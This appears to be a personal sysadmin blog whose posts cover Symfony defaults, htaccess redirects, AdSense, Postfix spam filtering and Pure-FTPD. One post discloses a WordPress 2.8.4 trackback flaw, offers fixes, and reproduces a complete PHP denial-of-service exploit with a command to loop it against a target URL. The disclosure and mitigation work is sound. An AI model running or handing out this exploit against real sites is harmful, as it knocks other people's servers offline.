Custom default values in Symfony 1.4
Hey everyone, it’s been a while.
Lately I’ve started to dig into the PHP web framework Symfony, and I have to say I’m very impressed. It makes building web applications fun again: adding new features and expanding on existing ones becomes very easy.
In my day job as a system admin I’ve been deploying Symfony applications for years, but hadn’t been involved with them much beyond that. I’m very glad I finally took the plunge into Symfony myself. After a couple of days of banging my head against the wall and slowly climbing the learning curve, things finally started falling into place, and since then my time spent coding has felt much more efficient.
Anyways, I had some issues finding solutions to some simple problems, one of them being setting up default values.
In your config/doctrine/schema.yml file you can set models to be timestampable:
Category:
  actAs: { Timestampable: ~ }
This is a nice and simple way to maintain created_at and updated_at fields. I quickly found out, though, that updated_at isn’t only set when you edit the record in the backend, but anytime anything on the record changes. Which makes sense, but wasn’t what I first assumed.
One of my websites tracks a lot of activity, and the updated_at behavior was a bit heavier than I was looking for; extra queries can quickly build up and start slowing down your website. I ended up removing the Timestampable option and instead added a plain date column:
Category:
  columns:
    added: { type: date }
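After a schema change like this you also need to regenerate the model classes and update the database itself. In symfony 1.4 that is typically something along the lines of the following, adjusted to your own workflow (migration or rebuild):

php symfony doctrine:build --model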
Now, in order to set the added field automatically only when the record is created, edit or create the following file, named after your model:
lib/model/doctrine/Category.class.php
class Category extends BaseCategory
{
    public function assignDefaultValues($overwrite = false)
    {
        parent::assignDefaultValues($overwrite);
        $this->added = date('Y-m-d');
    }
}
What this does is set the value of added to the current date in YYYY-MM-DD format (e.g. 2011-04-12).
In assignDefaultValues() you can set any other defaults you like, in the same way the date is set here.
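For example, if the model also had a status column (a hypothetical column, purely for illustration), you could default both fields in the same method:

public function assignDefaultValues($overwrite = false)
{
    parent::assignDefaultValues($overwrite);

    $this->added  = date('Y-m-d'); // today's date, e.g. 2011-04-12
    $this->status = 'active';      // 'status' is a hypothetical column
}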
This is very simple to set up once you know how, but finding out how to set these defaults isn’t as easy as it could be.
I hope this simple post helps some people figure this simple solution out quicker than it took me.
Google Instant – Good or Bad for SEO?
Google’s change to its search results today, Google Instant, got me thinking about how it’s going to affect SEO.
I think long tail keywords will be affected the most. For example, someone who would normally search for “arcade games to play” may end up seeing the results for “arcade games” and clicking on one of those.
This could come into play even more when you’re not quite sure what you’re searching for, and two keywords find what you would previously have found with four or so. Only time will tell how this works out in the long run.
I’d be happy to hear your thoughts on the matter.
Google AdSense Page RPM
I just noticed the daily earnings report for Google AdSense has changed a bit. I’ve done some searching and haven’t been able to find out what Page RPM is. Is it just a new way of saying eCPM? Someone out there must know. I’d be curious to hear your comments on it.
Edit: Turns out it’s revenue per thousand page views. Just another way to say eCPM, I believe.
Thanks!
Redirect to www with htaccess
Many webmasters don’t take any steps to ensure their website is accessed at http://www.example.com and not http://example.com. One reason to do this is the presentation of your site in Google’s search results. Another is that if you don’t control which address is presented, Google will make the decision for you. This can lead to issues with duplicate content, splitting of PageRank and other SEO benefits, along with confusion when monitoring results in tools like Google Webmaster Tools.
When a person links to your site, they may simply link to http://example.com. Another person may link to http://www.example.com. This would be like looking at money.cnn.com vs www.cnn.com. Google treats these as different websites, which can be harmful to the overall rankings for your site. It is generally a good idea to decide whether you want to redirect non-www to www.
The solution to this is a rather easy htaccess rule. To set up an htaccess rule you create a file called .htaccess in the root folder of your website, sometimes referred to as public_html/ or htdocs/.
First, turn the rewrite engine on with this line, if it doesn’t exist already:
RewriteEngine on
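Note that RewriteEngine on only switches the rewrite engine on; the mod_rewrite module itself has to be loaded in Apache. On most shared hosts it already is, but on a Debian-based server you can typically enable it yourself with something like:

# a2enmod rewrite
# /etc/init.d/apache2 restart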
Then you would put this below:
RewriteCond %{HTTP_HOST} !^www\. [NC]
RewriteRule .* http://www.%{HTTP_HOST}%{REQUEST_URI} [R=301,L]
The first line reads the HTTP_HOST and checks whether it starts with www. (the [NC] flag makes the match case-insensitive). If it does not, processing continues to the second line.
The second line takes the HTTP_HOST that was requested and simply adds www. to it, keeping the rest of the requested URI. For example, http://example.com/page.html is redirected to http://www.example.com/page.html. The R=301 says this is an HTTP 301 permanent redirect, and the L tells mod_rewrite to stop the rewriting process here and not apply any more rewrite rules.
To sum it up, a simple .htaccess file to redirect non-www to www would be:
RewriteEngine on
RewriteCond %{HTTP_HOST} !^www\. [NC]
RewriteRule .* http://www.%{HTTP_HOST}%{REQUEST_URI} [R=301,L]
It is also possible to redirect www.example.com to example.com. The code below will do that:
RewriteEngine On
RewriteCond %{HTTP_HOST} ^www\.(.+)$ [NC]
RewriteRule ^(.*)$ http://%1/$1 [R=301,L]
I hope this simple mod_rewrite rule will help when you decide to redirect non-www URLs to www, or the other way around.
Prevent Smart Pricing
Whether you know it or not, there is a penalty in place by Google for publishers who don’t convert well for advertisers. The term used to describe this penalty is “smart pricing”. While the information Google provides on this is very sparse and generally not very helpful, some research has been conducted to get more information.
The general definition of smart pricing is when you earn a very small amount per click, often much lower than you expected or previously earned. The penalty has been reported at upwards of a 90% loss in earnings per click. You can often go through your AdSense earnings history and find when it happened, as it’s quite apparent once you know what you’re looking for.
If you are a “victim” of smart pricing it can be very frustrating trying to work your way out of it. By putting victim in quotes, I mean that many webmasters, whether they know it or not, get themselves into the situation, although that isn’t always the case.
One industry I have experience in is the proxy industry, where many people do anything they can to ‘trick’ users into clicking on ads. You will find that many webmasters who run proxy sites implement questionable tactics. In the short term this may increase your revenue, as you’re sending more clicks Google’s way, but in the long run it will get you smart priced. Google will see that the clicks coming from your site are not converting and are of overall low quality (bounce rate, time on site, etc.).
So what should you do to prevent being smart priced, or fix it if it happens? It’s simple: arrange your sites to still clearly display ads to users, but let them choose to click them. This helps you send only interested visitors to Google’s ad network. Rumor has it that smart pricing is re-evaluated roughly weekly.
Now, keep in mind that all this information is just what I’ve gained from experience. These are by no means hard facts, but they make sense to me. I’d appreciate any thoughts on the matter in the comments. Now go make that money!
Help Fill Food Shelves
Kare 11 & Land O’Lakes are donating $1 for every person who clicks on their website. Go to the website listed below and in the upper right corner you will see a small banner: You Click, We Donate. Simply click on that banner. It’s that easy.
http://www.landolakesinc.com/company/corporateresponsibility/foundation/default.aspx
All it takes is a few seconds, and the money generated can go a long way to help people in need.
It Wasn’t Me
I noticed a spike in traffic yesterday and wondered what the heck was going on. I looked more into it and found out someone with the same name as me had charges filed against them for Conspiracy to Commit Securities Fraud.
More information can be found here: http://www.scribd.com/doc/22167590/Information-on-Steven-Fortuna
I’d just like to say that if you made it here searching for that guy, I’m not him.
I’m a 24-year-old (25 in a couple of days) IT geek from Minnesota, not a hedge fund manager suspected of insider trading.
New 0-Day WordPress 2.8.4 Exploit
WordPress, as of 2.8.4, is vulnerable to a very dirty exploit: a resource exhaustion DoS that is floating around in public right now. It’s a vulnerability in wp-trackback.php that hurts.
Here’s the results from a quick test against my server:
13:30:29 up 36 days, 1:06, 12 users, load average: 45.06, 17.11, 6.24
Very dirty.
Here’s a temporary fix that can be implemented until we get a real patch.
Add the following lines to your Apache 2 config file:
<Files ~ "wp-trackback.php">
Order allow,deny
Deny from all
</Files>
This should be placed in the main config, not a virtual host’s config. It will block any request for wp-trackback.php. This is a quick and ugly fix, but will help against this attack.
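If you can’t edit the main Apache config (on shared hosting, for example), a similar block in the .htaccess file at the root of your WordPress install should have the same effect, assuming your host allows these directives. Consider this an untested sketch:

<Files "wp-trackback.php">
Order allow,deny
Deny from all
</Files>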
I expect WordPress will have an update soon.
UPDATE: With the help of a friend we have created a quick fix:
In line #47 of wp-trackback.php, add this:
if(strlen($charset) > 50)
die;
Here’s the actual exploit.
<?php
/*
* wordpress Resource exhaustion Exploit
* http://rooibo.wordpress.com/
* [email protected] contacted and get a response,
* but no solution available.
*
* [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org <[email protected]>
*
* exploiting:
* you must install php-cli (command line interface)
* $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done
*
*/
if(count($argv) < 2)
    die("You need to specify a url to attack\n");

$url = $argv[1];
$data = parse_url($url);

if(count($data) < 2)
    die("The url should have http:// in front of it, and should be complete.\n");

$path = (count($data)==2)?"":$data['path'];
$path = trim($path,'/').'/wp-trackback.php';

if($path{0} != '/')
    $path = '/'.$path;

$b = "";
$b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,");

$str = 'charset='.urlencode($charset);
$str .= '&url=www.example.com';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol';

for($n = 0; $n <= 5; $n++){
    $fp = @fsockopen($data['host'],80);
    if(!$fp)
        die("unable to connect to: ".$data['host']."\n");
    $pid[$n] = pcntl_fork();
    if(!$pid[$n]){
        fputs($fp, "POST $path HTTP/1.1\r\n");
        fputs($fp, "Host: ".$data['host']."\r\n");
        fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
        fputs($fp, "Content-length: ".strlen($str)."\r\n");
        fputs($fp, "Connection: close\r\n\r\n");
        fputs($fp, $str."\r\n\r\n");
        echo "hit!\n";
    }
}
?>
Postfix Maildrop Spam Folder
Filtering spam in Postfix is pretty simple. There are some advanced techniques you can use, but simply setting up SpamAssassin will suit many people. One downside is seeing all the ***** SPAM ***** mails in your inbox. It took a while to come up with a solution, but the best fit so far has been using Maildrop to automatically move those messages to a Junk folder. Here are the steps to set this up on a Debian 5.0 system with Postfix and SpamAssassin.
First, setup your /etc/maildroprc file:
# commands and variables for making the mail directories
maildirmake=/usr/bin/maildirmake
mkdir=/bin/mkdir
rmdir=/bin/rmdir
MAILDIR=$DEFAULT

# make the user's mail directory if it doesn't exist
`test -e $MAILDIR`
if ($RETURNCODE != 0)
{
    `$mkdir -p $MAILDIR`
    `$rmdir $MAILDIR`
    `$maildirmake $MAILDIR`
}

# make the .Junk folder if it doesn't exist
JUNK_FOLDER=.Junk
_JUNK_DEST=$MAILDIR/$JUNK_FOLDER/
`test -d $_JUNK_DEST`
if ($RETURNCODE != 0)
{
    `$maildirmake $_JUNK_DEST`
    # auto subscribe. the following works for courier-imap
    `echo INBOX.Junk >> $MAILDIR/courierimapsubscribed`
}

# If the Spam-Flag is set, move the mail to the Junk folder
if (/^X-Spam-Flag:.*YES/)
{
    exception {
        to $DEFAULT/.Junk/
    }
}
The comments clearly state what’s going on there.
Once that’s set up, go into /etc/postfix/master.cf and make sure the following maildrop service entry is not commented out:

maildrop  unix  -       n       n       -       -       pipe
  flags=DRhu user=vmail argv=/usr/bin/maildrop -d ${recipient}
Next you will have to make the /usr/bin/maildrop binary setuid root, so that maildrop can interact with authdaemon and the mail folders:
# chmod +s /usr/bin/maildrop
Then you have to add this to your /etc/postfix/main.cf file:
virtual_transport = maildrop
maildrop_destination_recipient_limit = 1
If there is another virtual_transport line, be sure to comment that out first.
Last, set the permissions on the authdaemon directory so that maildrop can access it:
chown vmail /var/run/courier/authdaemon
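Finally, reload Postfix so it picks up the changes to master.cf and main.cf. On Debian 5.0 that would be something like:

# /etc/init.d/postfix restart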
And that’s all. A nice and simple way to handle all that junk mail.
Debian Pure-FTPD Virtual Users Howto
After being a dedicated Gentoo user, I’ve recently moved over to Debian, hoping to spend more time on productive tasks than just administering my servers. In the switch I had to configure Pure-FTPD to use virtual users, and the config files are quite a bit different from Gentoo’s.
I thought I’d write up a quick howto on configuring Pure-FTPD with virtual users in Debian, as sort of a personal reference, and in the hope someone else will be able to put it to use. And here we go...
Enable PureDB authentication:
# cd /etc/pure-ftpd/auth
# ln -s ../conf/PureDB 50pure
To disable PAM authentication and UNIX authentication so you only have virtual users:
# echo no > /etc/pure-ftpd/conf/PAMAuthentication
# echo no > /etc/pure-ftpd/conf/UnixAuthentication
That’s it. Simple, but when you’re coming from a single config file, this isn’t at all intuitive – at least it wasn’t to me.
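For reference, once PureDB authentication is enabled, virtual users are created and managed with the pure-pw tool. A rough sketch (the system user, group, home directory, and file paths here are just examples; on Debian the passwd and pdb files normally live under /etc/pure-ftpd/, and your conf/PureDB file points at the pdb location):

# pure-pw useradd joe -u ftpuser -g ftpgroup -d /srv/ftp/joe -f /etc/pure-ftpd/pureftpd.passwd
# pure-pw mkdb /etc/pure-ftpd/pureftpd.pdb -f /etc/pure-ftpd/pureftpd.passwd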
I’ve always recommended Pure-FTPD for its security, features, and simplicity. You can find out more information at the official Pure-FTPD project’s website: www.Pure-FTPD.org